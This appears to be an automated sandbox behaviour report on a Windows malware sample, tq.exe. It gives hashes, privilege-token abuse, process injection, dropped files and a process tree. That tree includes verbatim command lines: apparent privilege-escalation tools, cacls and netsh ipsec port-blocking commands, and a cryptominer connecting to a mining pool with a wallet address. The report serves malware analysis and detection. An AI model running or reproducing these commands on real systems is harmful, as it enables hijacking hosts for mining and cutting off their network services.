Analysis
- max time kernel: 55s
- max time network: 150s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 07-05-2021 13:02

Static task: static1
Behavioral task: behavioral1 (Sample: tq.exe, Resource: win7v20210410)
Behavioral task: behavioral2 (Sample: tq.exe, Resource: win10v20210408)
General
- Target: tq.exe
- Size: 418KB
- MD5: e8450e61f061fd90d74507eb04845ecd
- SHA1: f344f20c57f9cb01ea3166f3404336da1519a832
- SHA256: 0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
- SHA512: d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91
Malware Config
Signatures

- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Processes:
    description | pid | process | target process
    PID 3348 created 2732 | 3348 | svchost.exe | MS19.exe

- Downloads MZ/PE file

- Executes dropped EXE (7 IoCs)
  Processes:
    pid | process
    2732 | MS19.exe
    3936 | MS20.exe
    3752 | MSSQLH.exe
    1384 | RunDllExe.exe
    196 | RunDllExe.exe
    3828 | x64.exe
    2836 | wudfhosts.exe

- Registers new Print Monitor (2 TTPs)

- Sets DLL path for service in the registry (2 TTPs)

- Yara rule matches
  Processes:
    resource | yara_rule
    C:\Users\Admin\AppData\Local\Temp\x64.exe | upx
    C:\Users\Admin\AppData\Local\Temp\x64.exe | upx
    C:\Windows\Cursors\wudfhosts.exe | upx
    C:\Windows\Cursors\WUDFhosts.exe | upx

- Loads dropped DLL (2 IoCs)
  Processes:
    pid | process
    1980 |
    2140 | svchost.exe

- Drops file in System32 directory (6 IoCs)
  Processes:
    description | ioc | process
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | svchost.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | svchost.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | svchost.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | svchost.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | svchost.exe
    File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\Update[1].txt | svchost.exe

- Suspicious use of SetThreadContext (3 IoCs)
  Processes:
    description | pid | process | target process
    PID 196 set thread context of 1524 | 196 | RunDllExe.exe | svchost.exe
    PID 1384 set thread context of 1340 | 1384 | RunDllExe.exe | svchost.exe
    PID 2140 set thread context of 2912 | 2140 | svchost.exe | svchost.exe

- Drops file in Windows directory (17 IoCs)
  Processes:
    description | ioc | process
    File opened for modification | C:\Windows\Logs\RunDllExe_New.dll | RunDllExe.exe
    File created | C:\Windows\Help\active_desktop_render.dll | x64.exe
    File opened for modification | C:\Windows\Cursors\WUDFhosts.exe | x64.exe
    File created | C:\Windows\Logs\RunDllExe.exe | MSSQLH.exe
    File created | C:\Windows\MpMgSvc.dll | MSSQLH.exe
    File opened for modification | C:\Windows\Logs\RunDllExe | RunDllExe.exe
    File created | C:\Windows\Cursors\WUDFhosts.exe | x64.exe
    File created | C:\Windows\Help\active_desktop_render_New.dll | svchost.exe
    File created | C:\Windows\Logs\RunDllExe.dll | MSSQLH.exe
    File created | C:\Windows\Logs\Vers.txt | MSSQLH.exe
    File created | C:\Windows\Logs\RunDllExe_New.dll | RunDllExe.exe
    File opened for modification | C:\Windows\Logs\RunDllExe.dll | RunDllExe.exe
    File created | C:\Windows\Logs\RunDllExe_New | RunDllExe.exe
    File opened for modification | C:\Windows\Logs\RunDllExe | RunDllExe.exe
    File created | C:\Windows\Logs\RunDllExe_New | RunDllExe.exe
    File opened for modification | C:\Windows\Help\active_desktop_render.dll | svchost.exe
    File created | C:\Windows\Logs\RunDllExe | MSSQLH.exe

- Modifies data under HKEY_USERS (8 IoCs)
  Processes:
    description | ioc | process
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | svchost.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | svchost.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | svchost.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | svchost.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | svchost.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | svchost.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | svchost.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | svchost.exe

- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  Processes:
    pid | process
    3752 | MSSQLH.exe (2 entries)
    2912 | svchost.exe (10 entries)

- Suspicious use of AdjustPrivilegeToken (38 IoCs)
  Processes:
    description | pid | process
    Token: SeImpersonatePrivilege | 2732 | MS19.exe
    Token: SeAssignPrimaryTokenPrivilege | 2732 | MS19.exe
    Token: SeTcbPrivilege | 3348 | svchost.exe (2 entries)
    Token: SeImpersonatePrivilege | 3936 | MS20.exe
    Token: SeRestorePrivilege, SeBackupPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege | 3752 | MSSQLH.exe (this sequence of four repeated 7 times, 28 entries)
    Token: SeRestorePrivilege | 2912 | svchost.exe
    Token: SeBackupPrivilege | 2912 | svchost.exe
    Token: SeSecurityPrivilege | 2912 | svchost.exe
    Token: SeTakeOwnershipPrivilege | 2912 | svchost.exe
    Token: SeLockMemoryPrivilege | 2836 | wudfhosts.exe

- Suspicious use of SetWindowsHookEx (8 IoCs)
  Processes:
    pid | process
    2840 | tq.exe
    3752 | MSSQLH.exe
    1384 | RunDllExe.exe
    196 | RunDllExe.exe
    3828 | x64.exe
    2140 | svchost.exe
    2912 | svchost.exe (2 entries)

- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes:
    description | pid | process | target process
    PID 2840 wrote to memory of 2732 | 2840 | tq.exe | MS19.exe (2 entries)
    PID 2840 wrote to memory of 3936 | 2840 | tq.exe | MS20.exe (2 entries)
    PID 2840 wrote to memory of 3752 | 2840 | tq.exe | MSSQLH.exe (3 entries)
    PID 3752 wrote to memory of 2776 | 3752 | MSSQLH.exe | cacls.exe (3 entries)
    PID 1384 wrote to memory of 1340 | 1384 | RunDllExe.exe | svchost.exe (9 entries)
    PID 196 wrote to memory of 1524 | 196 | RunDllExe.exe | svchost.exe (9 entries)
    PID 3752 wrote to memory of 3828 | 3752 | MSSQLH.exe | x64.exe (3 entries)
    PID 3828 wrote to memory of 3952 | 3828 | x64.exe | netsh.exe (3 entries)
    PID 3828 wrote to memory of 3808 | 3828 | x64.exe | netsh.exe (3 entries)
    PID 3828 wrote to memory of 1336 | 3828 | x64.exe | netsh.exe (3 entries)
    PID 3828 wrote to memory of 2644 | 3828 | x64.exe | netsh.exe (3 entries)
    PID 3828 wrote to memory of 2428 | 3828 | x64.exe | netsh.exe (3 entries)
    PID 3828 wrote to memory of 3816 | 3828 | x64.exe | netsh.exe (3 entries)
    PID 3828 wrote to memory of 2996 | 3828 | x64.exe | netsh.exe (3 entries)
    PID 3828 wrote to memory of 3044 | 3828 | x64.exe | netsh.exe (3 entries)
    PID 3828 wrote to memory of 3460 | 3828 | x64.exe | netsh.exe (3 entries)
    PID 3828 wrote to memory of 3908 | 3828 | x64.exe | netsh.exe (3 entries)
    PID 3828 wrote to memory of 2580 | 3828 | x64.exe | netsh.exe (3 entries)
Processes (indentation shows the process tree depth)

C:\Users\Admin\AppData\Local\Temp\tq.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\tq.exe"
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\MS19.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\MS20.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cacls.exe
      Command line: cacls C:\Windows\Fonts\*.exe /e /d system

    C:\Users\Admin\AppData\Local\Temp\x64.exe
      Command line: x64.exe
      - Executes dropped EXE
      - Drops file in Windows directory
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static add policy name=Block

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static add filterlist name=Filter1

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static add filteraction name=FilteraAtion1 action=block

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1

      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh ipsec static set policy name=Block assign=y

      C:\Windows\SysWOW64\cmd.exe
        Command line: cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"

\??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k netsvcs -s seclogon
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\Logs\RunDllExe.exe
  Command line: C:\Windows\Logs\RunDllExe.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\svchost.exe
    Command line: C:\Windows\system32\svchost.exe

C:\Windows\Logs\RunDllExe.exe
  Command line: C:\Windows\Logs\RunDllExe.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\svchost.exe
    Command line: C:\Windows\system32\svchost.exe

\??\c:\windows\syswow64\svchost.exe
  Command line: c:\windows\syswow64\svchost.exe -k graphicsperf_svcsgroup -s GraphicsPerf_Svcs
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx

  C:\Windows\SysWOW64\svchost.exe
    Command line: C:\Windows\system32\svchost.exe
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx

    C:\Windows\Cursors\wudfhosts.exe
      Command line: C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
Downloads